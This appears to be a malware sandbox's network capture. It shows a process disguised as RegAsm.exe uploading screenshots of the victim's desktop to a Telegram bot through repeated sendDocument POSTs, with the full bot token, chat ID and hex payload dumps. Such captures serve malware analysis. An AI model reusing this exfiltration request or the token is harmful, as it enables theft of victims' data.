                                                                            2025-01-09 10:38:28 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:28 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:28 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:29 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:29 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.449760149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:30 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd31c4f413e0f2
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:30 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 34 66 34 31 33 65 30 66 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd31c4f413e0f2Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:30 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:30 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:30 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:30 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:30 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:30 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:30 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:30 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:30 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:31 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:31 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1828
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.449762149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:33 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd31e0e1c570f1
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:33 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 30 65 31 63 35 37 30 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd31e0e1c570f1Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:33 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:33 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:33 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 